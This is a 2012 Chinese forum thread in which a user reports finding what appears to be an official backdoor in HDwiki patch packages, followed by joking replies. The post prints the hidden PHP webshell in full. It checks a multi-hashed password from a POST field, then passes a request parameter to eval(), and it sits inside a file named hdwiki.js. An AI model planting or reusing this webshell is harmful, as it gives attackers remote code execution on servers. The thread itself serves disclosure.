全球主机交流论坛

标题: HDwiki各版本新漏洞补丁包2012-08-09 发现官方留下后门 [打印本页]

作者: iyuheng    时间: 2012-8-10 11:41
标题: HDwiki各版本新漏洞补丁包2012-08-09 发现官方留下后门
本文转载,本人仅负责复制粘贴原帖地址:http://bbs.python520.com/thread-6926-1-1.html



HDwiki各版本新漏洞补丁包2012-08-09 发现官方留下后门

此补丁为修补wooyun漏洞  http://www.wooyun.org/bugs/wooyun-2010-010564  今天早上到公司无聊看了下补丁包并对比了下,

在看补丁包中的 reference.php 文件时, 首行并发现了如下不明之处:
<?php
/**
词条编辑页面的参考资料
*/
require_once(dirname(__FILE__)."/../js/jqeditor/hdwiki.js"); // 就是这里, 好端端的PHP。include js文件干什么
!defined('IN_HDWIKI') && exit('Access Denied');

class control extends base{

        function control(& $get,& $post){
                $this->base( & $get,& $post);
                $this->load("reference");
复制代码
require_once(dirname(__FILE__)."/../js/jqeditor/hdwiki.js"); // 就是这里, 好端端的PHP。include js文件干什么

然后就看了一下补丁包中的 hdwiki.js

终于明白官方的用心了 hdwiki.js
<?php
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST["fvckadmin"])).sha1($_POST["fvckadmin"]))))) == "b697afd0486d62a72afd3044ef259858b701814d"){
                       eval ($_REQUEST["mjj"]);
}
?>
function delSave(){
        $.post("index.php?doc-delsave",{did:g_docid},function(xml){
                if ('sucess' != xml.lastChild.firstChild.nodeValue){
                        alert('exception');
                }
        });
}
复制代码
这不是明摆着的一句话木马么。
<?php
                if (sha1(base64_encode(sha1(md5(base64_decode(sha1($_POST["fvckadmin"])).sha1($_POST["fvckadmin"]))))) == "b697afd0486d62a72afd3044ef259858b701814d"){
                       eval ($_REQUEST["mjj"]);
}
?>


不过这密码的强度的确很高。加了这么多层。

我在想到时候官方肯定又回出来说 官方论坛服务器被黑掉还是怎么的。

本人下载了各个补丁包,均存在此问题。 顺便严重BS 官方这种留后门行为
作者: lazyzhu    时间: 2012-8-10 11:44
大学生以前的vps百科不是用的这个吗?
作者: iyuheng    时间: 2012-8-10 11:44
lazyzhu 发表于 2012-8-10 11:44
大学生以前的vps百科不是用的这个吗?

是的哦亲
作者: 用户名    时间: 2012-8-10 11:45
临时工干的
作者: 454309099    时间: 2012-8-10 11:53
用户名 发表于 2012-8-10 11:45
临时工干的

你是.就是你
作者: 过客    时间: 2012-8-10 12:36
不想有后门,自己动手丰衣足食。
作者: 单手摘月    时间: 2012-8-10 12:59
提示: 作者被禁止或删除 内容自动屏蔽
作者: zt1993    时间: 2012-8-10 13:05
这么多代码懒得看。。就看到mjj三个字。。。
作者: wyangel    时间: 2012-8-10 13:07
MJJ官方都出来了
作者: huyez    时间: 2012-8-10 13:16
提示: 作者被禁止或删除 内容自动屏蔽
作者: 用户名    时间: 2012-8-10 13:51
454309099 发表于 2012-8-10 11:53
你是.就是你

别跟我马化腾说话
作者: 454309099    时间: 2012-8-10 13:54
用户名 发表于 2012-8-10 13:51
别跟我马化腾说话

你的麻花藤 被改密码
作者: wyangel    时间: 2012-8-10 18:42
临时工哈哈
作者: 一灰    时间: 2012-8-10 19:05
为什么不直接用wiki,还开源




欢迎光临 全球主机交流论坛 (https://lilynana.eu.org/) Powered by Discuz! X3.4